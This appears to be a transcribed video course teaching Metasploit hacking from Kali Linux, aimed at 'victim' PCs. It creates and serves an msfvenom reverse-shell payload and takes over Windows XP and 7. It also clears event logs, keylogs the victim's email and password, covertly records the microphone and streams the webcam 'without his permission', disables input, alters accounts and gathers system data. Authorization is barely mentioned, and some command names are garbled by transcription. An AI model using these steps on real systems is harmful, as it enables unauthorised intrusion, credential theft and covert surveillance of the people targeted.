Welcome to my video. In this video, you are going to learn how to install VMware Workstation. VMware Workstation is a hosted hypervisor that runs on 64-bit version of Windows and Linux operating system. It enables the user to set up a virtual machine on a single physical machine and use them simultaneously along with the actual machine. Each virtual machine can execute its own operating system, including versions like Microsoft Windows, Linux, BSD, and MS-DOS. So that's a small introduction of an VMware Workstation. Now open your browser and type VMware Workstation. Click on the second link and next select the download link. I am selecting the 12th version. So here is the VMware Workstation version of 12.5.9 player, and next click on download and save the file. And now it's going to take some time to download. Now moving to my folder, I have already downloaded. Here you can see the VMware. It's an older version, and next double click on it and it will start installing. Click on next, accept, and selecting for create an icon on desktop so that it will be easy to open. Then click on next. So finally we have completed the installation of VMware. Then moving to the desktop, double click on it. So here comes the VMware Workstation. So that's how we are going to install VMware Workstation. In the next video, we are going to see how to install Kali Linux. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to install Kali Linux. Kali Linux is a daemon-based Linux distribution, penetration testing and security auditing OS. Kali contains several hundreds of tools which are geared towards various information security tasks, such as penetration testing, security research, computer forensic, and reverse engineering. Kali is developed, funded, and maintained by Offensive Security. It consists of more than 600 penetration testing tools, and all tools are free to use. Now open the browser and type Kali Linux and click on kali.org. That is first link. Here are the different versions of Kali Linux. So you can download any one version. Select the downloading link. It's a torrent file. So make sure that you have installed the torrent software so that it will be easy to download the Kali Linux OS. And next select and save the file. You will get the torrent link and move to the folder, double click on it and it will open the torrent downloader. Now I have already downloaded. It's an older version. Here you can see the downloaded file. Double click and unzip it, or you can also say it as extract. For unzipping file, you can also use WinRAR software. And after unzipping, open the folder and double click on 3-box Kali Linux VMware file. At this time, make sure that you have installed the VMware. Now the Kali will get installed. I am fast forwarding the video. And now enter the username as root and password as tar. That's it. Now you can say it as we have installed the Kali Linux OS. You can use any tool for your hacking and for finding something. So in the next video, you are going to see the Metasploit, which is the most important part of this course. So that's all this video. Thank you. Hi, welcome to my video. In this video, you are going to learn what is Metasploit and how does it works. Metasploit is widely used exploitation tool in hacking and security field, and most of the people call it as penetration testing tool. It makes easy to exploit known vulnerabilities in networks and operating systems and application, and also to develop new exploits. Penetration testing is an authorized simulated attack on a computer system looking for security weaknesses, and instructor detection system, which on the other hand monitors a network or systems for malicious activities. Metasploit framework is an open source and it is the most common exploit developed framework in the world. Metasploit has developed a meter that loads into the target system, makes maintaining access and controlling the target much easier. I would like to tell you, self-respecting hacker should have some basic knowledge of Metasploit. So now, open the Kali Linux. Now click on the terminal and just type MSF console, and here you can see the Metasploit gets loaded. The Metasploit consists of n number of exploitation. It may be on Android, Linux, Windows or Mac. Now type help. The help command gives the information of the commands which are present in the Metasploit. Here you can see some of the commands like core command, module command, job command, and credential backend command. So this command will help you in exploitation. So this is one of the method where you can open and use the Metasploit. And another one is, at the left side you can see the M logo. This M stands for Metasploit. Now click on it. The Metasploit gets loaded. Now here comes the Metasploit. So that's a small introduction of Metasploit. In further videos we are going to learn more things about Metasploit and different types of exploits. It may be like using a simple payloads, PDF file, shell code and few more. So now let's have some fun with the Metasploit. Thank you. Hi, welcome back to my video. In this video, you are going to learn creating a payload using MSFANM. So what is MSFANM? MSFANM is a mixture of MSF payload and MSF encode. Both are combined into a single command. This was done because the MSF encoding and MSF payload were having different types of encoding. So that was really difficult for exploitation. So for that, they created MSFANM. So that's a small introduction of an MSFANM. Now open your terminal and type MSFANM -H. The H option stands for help. Here you can see many options used to create a different types of payloads. Now in these options we are going to use P. P stands for the payload, and F. F stands for the file format. And if you are making use of Arch, then you need to use -A. So these three options are commonly used to create a payload. And now typing MSF vanum p windows /meterpreter /reverse TCP lhost equal to IP address and the L port equal to port number f exe. So here I am creating the exe file. So for that I am using the file format as exe, and next and the file name shell.exe. So as I told you, the P stands for the payload and F stands for the file format. what is Windows/Meterpreter/reverse TCP. So this is a model. By using this model, we are going to create a payload for the Windows. If we are going to create a payload for Linux, then we are going to use Linux/Meterpreter/reverse TCP. And next, moving to the L host. The L host is a very important part of creating a payload, because when you create a payload, the victim PC must be connected to one of the network. So it's really necessary to add the L host. The L host stands for the localhost, which is your IP address. And there is also an R host, which is called as remote host. The remote host stands for the victim IP address. Now moving to the L port. To maintain a connection between the victim and the attacker PC, so we use L port. After typing everything, then press enter, then wait for a while. Okay, here I got created the payload. The most important question asked by all the students is that how to send the payload to the victim device. So for that, there are two techniques. One is social engineering, or you can create your own server on Linux. Here I am typing service apache 2 start, then pressing enter. Now moving to the folder, click on where folder. In that, www and html. Now I am pasting it here. Now opening the browser and then typing my IP address. You can type your IP address. So now here you can see the shell.exe payload. So that's how we are going to create a payload and send it to the victim device. So if you are creating any payload based on Android, Linux or Windows, follow these steps and create a payload. That's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to use the system commands. So what are these system commands? The system commands are those which are used in the Meterpreter after opening the session. So let's check out here. I have already got the session, and here you can see the system commands. There are totally 21 or 22 commands. Let's try it one by one. You can copy or type these commands. So here I am using the first command, that is clear log. This is nothing much. It will just clear the event logs which are presently running on the victim machine. Moving to the next command, that is drop_token. Copy it and then paste it. Press enter. So this drop command execute the function command_drop_token. It will execute the API call from client.system.config.drop_token. Here it is showing the relinquished tokens now running as sac pc/sac. Now moving to the next command, that is getPID. Everyone knows that what is getPID. This command will provide the processor ID of the current running processor. The current running process is the victim machine has a processor ID of 4600. And moving to the next command, that is getPrivileges. This command will help you to get the privileges. Here you can see some of the privileges. These privileges can be used for attacking purpose. Moving to the next command, that is getSID. The command SID stands for security identifier, or you can say it as a server ID. This command will provide the server SID. So here is the victim PC server ID S-1-5 and so on. Moving to the next command, getUID. The getUID command displays the user. So here it shows that the username as sacpc. And moving to the next command, that is local time. This command will show you the local time of a victim machine. So here you can see the time of the victim machine. Moving to the next command, that is system info. There is nothing much to explain about this. This command will give the system information of a victim device. Moving to the next command. So why I am showing the shutdown command at the last, because once if I shut down the victim PC, the session will be lost. So it will be difficult to handle the victim PC once again. Now pressing enter. Here I have made a small video over it. Now here you can see that the victim PC is getting shut down. Moving to my terminal, here you can see that the session has been broken. So that's all about the system commands present in the Metasploit. So make use of the system commands and have some fun. That's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to exploit Windows 7 using Metasploit. So the payload which we have used in the Windows XP, the same payload we are going to use in Windows 7, because what the vulnerability was present in the Windows XP, the same vulnerability was present in Windows 7. Now here I have already opened the MSF console and now typing use exploit /multi /handler, then pressing enter, and next setting up the payload. Type set payload in capital letters. Next Windows /Metasploit /TCP, and next setting lhost and the IP address. As I told, the LO stands for your IP address. And next, setting up the L port. At last, type exploit, send the payload to the victim device, and when the victim tries to run the file, and double click on it. Here I am not having any victim. Now I am going to click on the victim PC. Now I am double clicking on the payload. So here I got the session open. Here you can see that the victim device is connected. Now I can control the victim device. Let me check the system information of the victim. For that I am typing sys info. Okay, now here you can see the victim PC information, that is Windows 7 and the victim PC name. So that's how we are going to exploit the Windows 7 by using Metasploit. That's all in this video. Thank you. Hi, welcome back to my video. In this video, we are going to learn how to exploit Windows XP using Metasploit. In the previous video, you saw the how to create a payload by using MSFNM. Now we are going to see the using the same payload, we are going to exploit Windows XP. In further videos, I'll be showing how to exploit Windows 7, Windows 8 and Windows 10. So if you know about it, then move to the further video so that it will be helpful for you to learn more things. So here I am using the same payload which you saw in the previous video, and the same payload I am going to use in the Windows 7. Now I have already opened the MSF console. There are many models used for exploitation, but this is a simple one. Now type use exploit /multi /handler, setting up the payload by typing set payload. Payload must be in the capital letters. Windows /Metasploit /TCP. So this model is used for exploiting the Windows. and setting up the L host, that is your IP address, and setting up the L port. At last, exploit, and double clicking on the payload which is present on the Windows XP. Okay, now here I got session open. So here you can see the victim device got connected. Let me check the system information. So here you can see that it's a Windows XP and the PC name. So that's a simple exploitation of a Windows XP using the Metasploit. In further videos, you are going to see how to exploit Windows 7, Windows 10 and Windows 8. That's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to use the interface commands. So user interface commands are those where you can see what the victim is doing. Now let's start the first command, that is enum desktop. This command will help you to list all the accessible desktops and workstations. So here is the Windows station with session 1. Moving to the next command, that is get desktop. The get desktop command gets the current Metasploit desktop, means it will get your session which is running on the victim PC. So here is session with 1/w/d. It will be different for you. And moving to the next command, that is idle time. This command will display you the seconds or minutes. Here it is showing that it has been 4 minutes the victim was idle. So let me check it once again. I will do something on the victim PC and then once again I am running the same command, idle time. So here it is showing 3 seconds, means the victim was working since from 3 seconds back. Moving to the next command, that is screenshot. This command is simple. It will get the victim desktop screenshot, means you can see that at present what the victim is working on. So here is a screenshot. It has been saved in the root folder. Let me show you. So here is the victim PC screenshot. At present the victim is doing nothing. Now moving to the next command, set desktop. This command gets you the switch to a different screen based on who is logged in. Here is the change desktop to WinStation 0/default. And moving to the next command, that is last command, uictl. So this command can control the keyboard and mouse of the victim, like enable and disable command with that keyboard and mouse and all. Let me show you how to use this command. Now typing uictl disable all. The all stands for both the keyboard and mouse. Now I can show that the victim PC's keyboard and mouse has been stopped working. You can try it by your own. And if you want to enable the command, then you should type uictl enable all. So that's how we are going to use the user interface command on the victim PC. That's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to use the keylogger present in the user interface command. Why I made this separate video? Because this is the most important thing asked by the most of the students. Keylogger. A keylogger will record every keystroke made by the computer user. Means whatever the victim is going to type using the keyboard, you are going to get it. By using the keylogger, we can get the victim password or any other information when he is typing. Here you can see that I have already opened the session and got the system info, and now typing help command. Moving to the user interface command. Here are the three options. First one is key scanning dump. This option is used to dump the words which has been typed by the victim. And the second one is key scanning underscore start. This option is used for to start the keylogger. And the third option is key scan underscore stop. After everything, if we want to stop the keylogger, then we have to use this option. So let's start. Think that if the victim is going to log in, now type key scan underscore start. Now the keylogger has been started. If the victim is typing anything, it will dump. On the victim side, I am entering the email ID and the password. So now I am going to type keyscan underscore dump, then pressing enter. So now here you can see the email ID of the victim and the password. So this is one of the simple method where you can get what the victim is going to type. Now if you want to stop the keylogger, then type key scanning underscore stop. So that's how we are going to use the keylogger which is present in the user interface command. That's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to control the victim's webcam. So let's start. Here are the webcam commands. Let's do it one by one. Now select the record underscore mic command. Copy it and then paste it. So this command gets the audio of the victim microphone for only few seconds. Now here you can see it has been started recording. After recording, it will save the file automatically and the file name will be saved with .wav extension. Now if you want to check the audio file, then move to the root folder and there you can find the audio file, and here you can find the audio file. So that's all about the recording underscore mic command. And moving to the next command, that is webcam underscore chat. So this command helps you to make a video chat with the victim without his permission. For this, a victim session will be created. Now wait for some time, it will come. Here you can see the victim has connected to my PC. It shows nothing because I am not having any webcam. At the victim side, you can see the webcam is on and the video chat is going on live. This has happened because I used my laptop as the victim PC. So that's all about the webcam chat. Now moving to the next command, that is webcam list. Copy it and paste it. So this command will show you how many webcams are connected to the victim PC. So here is only webcam is present at the victim side. And moving to the next command, so that is webcam underscore snap. Then copy the command and paste it. This command will take the snapshot of the victim webcam. So here you can see the victim webcam snapshot. And moving to the next command, that is webcam underscore streaming. Copy it and paste it. So this command helps you to see what the victim is doing at the present moment. So here is the live streaming of a victim PC. So this command is better than doing the webcam chat. So you can see that what the victim is doing. So like this, you are going to control the victim PC webcam. That's all this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to get the information of network present on the victim device. Meterpreter provides some of the useful networking commands. These commands are helpful to understand the networking of a victim device. So let's start with a simple one. Here I have already got the session and you can see the system information. Now I'm going to type ifconfig and next type ipconfig. So now here you can see the victim IP information. The IP information is based on the different interface. Interface 1 consists of a software loopback. Interface 10 wireless networking of an Intel. Interface 11 is of Microsoft Virtual Wi-Fi mini port adapter. Interface 12 is of Microsoft Virtual Wi-Fi mini adapter /2. Interface 14 is of Bluetooth device, that is personal area network. Interface 15 is of virtual machine, that is virtual Ethernet adapter. All these interfaces having the MAC address and the address of IPv4 and IPv6. So that's all about the IP config which is present on the victim device. For getting the more information about the victim's network, then we should enter into the shell command. So now type shell. Here we are in the victim PC downloading folder. So if you want the more information, then we should need to move for system32 folder. For that type cd ... so that you can move back. Once again typing cd ... and next type cd Windows, then press enter and once again cd system32. So now here we are in the system32 folder. I think you have got it. And next I'm going to type system info bar find string. So this command enumerates about the network interface card using the system info command, and that information can be extracted by the find string network. So by combining these two, here you can see the network card information of a victim device installed on it, and it has connected to the wireless network connection. And also you can see the Bluetooth device information. And then moving to the next command, that is ARPA-A. So this option will get you all the ARPA interface. ARPA is the address resolution protocol. Using the ARPA command, we can enumerate the MAC address of the other systems in the same network as the victim systems. Then moving to the next command, type ipconfig/display DNS. So this command can be used to enumerate the DNS hash using the ipconfig command. This contains all the records of the website recently visited or attempt to visit by the victim. Here I can see some of the websites which are visited or tried to attempt to visit by the victim. Recently the victim has visited the Android website, and you can see some of the IP address of the websites and the localhost. So that's how we are going to check the DNS information of a victim device. Moving to the next command, that is netstat-ano. A displays all the connection and the listening ports. N displays the address and the port number. O displays the processor ID. Now here you can check all the connection and the listening ports of a victim along with the processor ID. So that's how we are going to get the network information of a victim PC. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to check the victim's WMSC status using the Meterpreter shell command. So what is WMSC? WMSC is a Windows Management Instrumental Command Line. When you get the Meterpreter of an victim PC, then you can enumerate the information of an victim and make changes using the WMSC command. And now, here I am already in the shell command. If you want to open the shell command, after getting the Meterpreter command, just type shell. So before moving further to WMSC command, we'll just get the information by typing WMSC/?. Here is the information and the options present in the Windows Management Instrumentation command line. This shows that the following options are globally switches. If you type system info in the Meterpreter command, you will only get the few information of a victim PC. What if you can get the more information in depth? So for that, here I am typing WMIC, computer system, get name, domain, model, username, roles, /format, list. So what this command stands for? Here the name gets the PC name, model gets the model information. I have kept the roles as the format list because I want to get all the information in the list format. For that I have typed format is to list. So now here you can see the information about the victim device, that too in the listed format. Moving to the next command, that is SIDS, server ID or security identifier. For this command, I am going to type WMSC group get caption, install date, local account, domain, SID, status. So here you can see the SID information. You can see the captions, install date, local account and domain at status. And then moving to the next command, think of what if you can get the BIOS serial number of the victim device. For that you should need to type WMIC BIOS get serial number. Then pressing enter. Different users have the different serial number. So here I got the victim PC serial number. It shows only half, but for you it may show fully. Then moving to the next command, what if you can lock the details of the user account management? So for that you should need to type WMIC user account where name equal to SAC, it's an username, and set disable equal to false. Then pressing enter. Okay, here you can see the user account has been locked. It shows that it has updated successfully. It may work for some PCs, it may not. Moving to the next command, renaming the user account. For that, you should need to type WMIC username where name equal to SAC and I am renaming as SACHacken. So here you can see that the renaming a local user, the output shows that it has been executed successfully. Like this, there are many commands present in the WMIC. I have given in the description. You can try them. That's all in this video. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to get the victim PC product key. So basically, product key is the one which certifies the software or operating system or any other program is original. The product key consists of series of numbers or letters. This sequence is typically entered by the user during the installation of software or operating system. And this product key passed over the verification function in the program. This function manipulates the key sequence according to the algorithm and attempt to match the result to set a valid solution. So that's a small introduction of an product key. So here we are going to get the victim PC's product key by using one of the exploitation model present in the Metasploit. So let's begin. Now first we need to exploit the victim PC by using the simple exploit model. So here you can see that I have already done it. Exploit / multi / handler and set the payload and also the L host and L port, exploit, and also you can see the system information, it's in Windows 7. Now I have already got the session, and next pressing Ctrl Z. So now the session which is used for exploiting the victim PC is now running in the background. Now I am going to use the enum_ms_product_key, which is a model. By using this model, we will be getting the product key of a victim PC. I am typing use post/gather/enum_ms_product_key. Now I have set the model. Next, setting up the session, set session 1. The 1 stands for session ID. At last, typing exploit. Now you can see that we did not got anything here. Let me try it once again. Here also it is showing nothing. Now moving to the another terminal, here you can see the system information of Windows XP. Now I am going to use the same exploit model for exploiting. I will do it a little bit faster. Use post/windows/gather/enum_ms_product_key and setting up the session. At last, exploit. Wait for a while. Now here you can see that the product key of Windows XP, and this product key is stored in the /root/.msf4/loot. So in the loot folder, the product key has been copied into .txt file. So you may be having the question that why it did not happen in the Windows 7. The vulnerability which was present in the Windows XP has been fixed in Windows 7. But if you are using the crack version of Windows 7, then it can be exploited. There you can get the product key of Windows 7. So that's all about the getting product key of a victim PC. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to gather the victim PC directory permissions. So getting the directories is much easier, but getting the directory permissions is not. So if you're trying to do with a simple exploit method, then you will not get any directory permissions. So for that, we need to use the post exploitation method. So how to do that and how to get the directory permissions? Let's begin. As usually, to get this session, first we need to use the simple and common exploit model. For that, type use exploit/multi/handler, and next setting up the payload, set payload windows/interpreter/reverse_tcp, and next setting up the L host, that is set lhost and the IP address. Always remember that you have to set your IP address. And next, setting the L port, set L port and the port number. At last, typing exploit. So now here I got the Metasploit session. And next, pressing Ctrl Z, then pressing Y, enter. Now the exploited session will be running in background. So if you want to check whether the session is running background or not, then we should need to type sessions. Here you can see that the one session is running in the background and its session ID is 1. Now I am going to use the enum_dir_perms, that is directory permission. This model enumerates the directories and lists the permissions set on found directories. So here, if the path option is not specified, then the model will start enumerating whatever is in the target machine. So if you not specify the exact path, then this model will start enumerating whatever is present on the victim PC. Now typing use post /windows /gather /enum_dir_perms, that is directory permission. And next, setting up the session by typing set session 1. At last, typing exploit. Now here you can see that it is started getting the victim's PC's directories permissions. So what are these directory permissions? These directories are secured from the other users. Means if you want to rename or create or remove or delete these directories, you need the user permission. And also these directories need execute permission. So that's how we are going to get the victim's PC's directory permissions. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to get the USB history of a victim PC. USB stands for Universal Serial Bus, which can be used to connect or communicate with other devices. In the real world, you can see n number of devices like pen drive, mouse, keyboard, joystick, or you can take any other devices. Almost all devices are connected through the USB. So now, what if you can get all the details of USB connected to the victim PC? So how to do that? Let's begin. Now here you can see that I have already exploited the victim PC by using the simple model, that is use exploit /multi/handler, and also set up the payload using windows/meterpreter/reverse_tcp and set up the L host, that is my IP address, and the L port. At last, exploit. Here you can see that I have already got the session and the system info, and also check the active sessions. So here you can see one active session is present. So as I told you, we are going to get the USB history of a victim PC. For that, I am going to use USB history model, which is present in the Metasploit, and this model comes under the post exploitation. Now here I am typing use post /windows/gather /USB_history, and next, setting up the session, set session 1. The 1 stands for session ID. Remember that you may get the different session ID. It may be session 1, 2, 3 and so on. And next, typing exploit, then pressing enter. Okay, here you can see that it has started getting the USB history of a victim PC. The victim PC has connected to the multiple USB devices like pen drive, multi-USB device and many more. So this model gives us the information of manufacturer of the product, driver details and class. So that's how we are going to get the USB history of a victim PC. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to get the application installed on the victim PC. So when you are trying to exploit the victim PC, we will be eagerly waiting for which type of application has been installed on it. So by using the one of the model present in the Metasploit, we are going to gather the applications installed on the victim PC. Let's begin. Here I am using the simple exploit model. I am doing it a little bit faster because if I show you every time the same thing, you will get bored. Now typing use exploit /multi/handler and next setting up the payload, set payload windows /interpreter /reverse_tcp and next setting up the lhost, set lhost. Remember that this lhost is your local IP address. And next setting up the L port. At last exploit. Now here you can see the system information of a victim PC. As we got this session, so by using this session we are going to gather the applications installed on the victim PC. Now pressing Ctrl Z so that the session will be running background. Now here I am using the enum_application model. So this model will gather all the application installed on the victim PC. Now typing use post /windows /gather /enum_applications. Now I have set the model. Next setting up the session. Set session 1. Now I have set the session. At last typing exploit. Now here you can see all the installed applications which are present on the victim PC. So this vulnerability is present both on the Windows XP and also in Windows 7. So that's all about gathering the applications installed on the victim PC. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to get the links present on the victim PC. Getting links or dumping links from the victim PC is just like gathering the information of a victim. So if you are trying to dump the link files from the victim PC, then you will get in .lnk extension. So these files are used by the Microsoft Windows to point an executable files. LNK stands for link. and the shortcut files are used as a direct link to an executable file instead of having to negative to the executable. And these files come with some properties such as the path of an executable file and the start in directory, and also .lnk file which contains stamps, file location including sharing name, volume serial number and more. So now let's begin. Here I am using the simple and common exploit model, typing use exploit /multi/handler, and next setting up the payload, set payload windows /meterpreter/reverse_tcp, and next setting up the lhost, set lhost and the IP address. Always remember that this lhost is your local IP address, and next setting up the L port, at last typing exploit. So now here you can see that a session has been created. So by using this session we are going to dump the links which are present on the victim PC. Now pressing Ctrl Z, after that Y. So now the session will be running in background. To check the active session we need to type sessions. Here you can see the active session. Now for gathering the information I am using the post exploit model. So for that I am typing use post/windows/gather /dump links. So this model is going to get all the links from the victim PC. And next setting up the session by typing set session1. The 1 stands for the session ID. At last typing exploit. Now wait for some time. Okay, now here you can see that it has started gathering all the links from the victim PC. So the Windows has created these link files automatically for many common files. In the most of the PC, the app data folder will be hidden. Now here you can see that the content present in the app data has been added to the .lnk file. That means we can gather all the information from the victim PC when it is hidden also. So that's how we are going to dump the links present on the victim PC. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to do FTP port scanning of a remote host. FTP stands for File Transfer Protocol, and also we can call it as transmitting the files between network over the internet. The FTP is a client-server protocol that allows to communicate between the client and server. When you are using the FTP, you can transfer your files between your local machine and to the server. Client initiates the conversation with the server by requesting uploading the file, downloading, deleting, renaming, moving, and copying the file from the server. If the user wants to use the FTP server, then he should need to log in. If the FTP server is showing the sum of the contents which is available on the server, then the FTP server is known as anonymous FTP. So how to use the FTP on Linux? For that I am typing FTP and the IP address, and it has connected. You can see the FTP version, that is 2.3.4, and now let me enter the username, that is msfadmin, and next the password, then pressing enter. Here it shows that the login has been successfully done. Now here you can transfer your files to the server. So that's a simple method to use the FTP. Now coming to the Metasploit part, the Metasploit consists of an scanning model where you can find which version of an FTP is used by the server. So here you can see that I am running server. The server consists of all the ports. You can see that the TCP IP port number is 21. So here you can see that the Metasploit has been loaded. And next here I am typing use auxiliary /scanner /FTP. Now the model has been set. And next typing show options. So here you can see the model information, that is FTP pass, FTP user, rhost, port, it is already set, and threads. So if you want to do brute force attack to the FTP account, then you can use the FTP pass and FTP user. But here we are only scanning for which version of an FTP is present at the server. So next, setting up the rhost by typing set rhost. Here I am setting the range between 50 to 250. And next, setting up the threads by typing set threads 70. For every 7 seconds, it's going to give the output. You can set your own threads. At last, exploit. Okay, now wait for some time. Here I did not got anything. Let me try it once again. Then again exploit. Okay, now here I got the FTP version. Here you can see that I have got the FTP version, that is VS FTPD 2.3.4, and it's an anonymous read. So that's all about the scanning. There are many methods to get the login access of an FTP account. For example, brute forcing, FTP fuzzing, FTP enumerating. How to do that all things you will see in the later videos. So that's all about the FTP port scanning of a remote host. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to do SSH port scanning of a server. So, what is SSH? SSH stands for Secure Socket Shell, and it is related to the network protocol securities. The SSH provides high authentication and secure data communication between two devices which are connected to the network over the internet. The SSH is widely used by the network admin for managing the systems and applications remotely. By using the SSH, we can transfer the files in a secured manner. The SSH was designed as a replacement for Telnet of an unsecured remote shell protocols. So now, coming to the Metasploit part, the Metasploit consists of scanning model where you can find which version of an SSH is used by the server. So here you can see that I am running with a 2 server, then both the servers consist of all the ports, but here we are only concentrating on the SSH. Here you can see that the SSH port is open, the TCP IP port number is 22. So when you are targeting to attack for SSH, you need to know which version is used by the server. Now here you can see that I have already opened the Metasploit framework, and next typing use auxiliary /scanner /SSH /SSH underscore version. So now we have set the model, and next typing show options. It's in model information. Here you can see that the R host need to be set, and the R port which is already set, that is 22, and threads, and thread is set to 1, but you can change it here. So next, setting up the R host by typing set R hosts and the range of IP address. Here I am setting the range between 10 to 200. Whatever the hosts are present between the 10 and 200, if they consist SSH, then it will give all the details present on that server. And next, setting up the threads by typing set threads 70. That means for every 7 seconds it's going to give the output. At last, exploit, or you can use the run command. So here you can see that it has already started scanning. Let's wait for some time. Okay, this time I got it early. Here you can see that the SSH version of a server is 2.0 and it's an OpenSSH 4.7 P1. I think one more server has not been detected. It's okay, but at least we got one. So if you want to log in access to an SSH server, then you can get it by doing brute forcing. So that's all about the SSH port scanning of a server. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to do telnet port scanning of a server. So basically, telnet is a protocol that connects to the hosts over an internet, and it is a text-based computer protocol. Telnet can be used to connect between the client and the server. When a client establishes a connection to the server, your client becomes a virtual terminal and allows you to communicate with the server from your PC. The telnet has been famous from being the origin of the internet, like from a long time. Now coming to the Metasploit part, the Metasploit consists of a scanning module where you can find which version of an telnet is used by the server. So here you can see that I am running with the two server. Both the server consist of all the ports. The TCP IP port number of an telnet is 23. So now here you can see that I have already opened the Metasploit. If you want to search any module, then you can search by typing search and the module name. And next, here I am typing use auxiliary slash scanner slash telnet underscore version. So now we have set the module. And next typing show options. Here you can see that the password, R hosts, R port, and the username. These username and password are used only when you're trying to brute force the user account. So next, setting up the R host by typing set R hosts and the range of IP address. Here I am setting 10 to 200. And next, setting up the threads, set threads 80. That means for every 8 seconds it's going to give the output. At last, exploit. Okay, here you can see that lots of error messages are coming. Let me check. Here you can see that one of the victim server has been exploited. As I told you, telnet port number is 23, and also you can see that the username and password of the telnet, it is showing because the telnet is a text-based computer protocol. Means whatever the username or password is present, it will display directly. Here you can see the username and password of a server, and it says that never exploit this to an untrusted network. means it's giving the warning don't show to the attackers. And it will be keep on scanning until it reaches the last number of an host, that is 200. So now it has stopped. So that's all about the telnet port scanning of an server. Thank you. Hi, welcome back to my video. In this video, you are going to learn how to do SMTP port scanning of a server. The SMTP stands for Simple Mail Transfer Protocol, and it is represented on a TCP IP network where it can send the emails from one side to another. The SMTP port number is 25 and at the server side 587. The SMTP specially work on application layer. So basically SMTP is an electronic mail server, and other mail transfer agents like Google, Yahoo, Hotmail use SMTP to send and receive the mail messages. The user level client mail applications typically uses SMTP only for sending the mails. For retrieving the messages, client applications usually use POP3 or IMAP. So that's a simple and short explanation of an SMTP. So if you want to check any user is existing on a SMTP, then you need to use this command, that is smtp-user-enum-m, that is model VRFI verification -d, that is domain Metasploit.local domain, it's an server protocol -u, that is username SAC -t, target, and the IP address. So here you can see all the information I have entered to verify whether the user is present or not. But here I got the 0 results because I did not added any user to SMTP. Coming to the Metasploit part, the Metasploit consists of a scanning model where you can find which version of an SMTP is used by the server. Let's begin. So here you can see that I am running with the server. This server consists of an SMTP ports. That means we can use the server to send and receive the emails. But here we are only concentrating on the SMTP port scanning. When you are trying to attack the target machine, we should check which version of an SMTP is used by the server. Now here you can see that I have already opened the Metasploit. And next here I am typing use auxiliary /scanner /smtp _version. Now the model has been set. And next typing show options. So here is the model information, R hosts, R port which is already set, that is 25, and threads. So next setting up the R host by typing set R host and the range of IP address, and next setting up the threads by typing set threads 40. You can set any number of threads. At last exploit. So here you can see that it has started scanning. Let's wait for some time. Now it has got the two server SMTP versions. One is of metasploitable.local domain and another one is of bbox. So that's how we are going to get the SMTP version of an server. So after getting this SMTP version, so the attacker tried to log in into the SMTP. That can be done by brute forcing or neither enumerating SMTP. So how it is done? When an attacker tried to verify whether an email account existing on a server, is simple to telnet to the server on a port 25 and checks for verification. If the verified user account is existing, then the attacker can control over the SMTP. So that's all about the SMTP port scanning of a server. Thank you.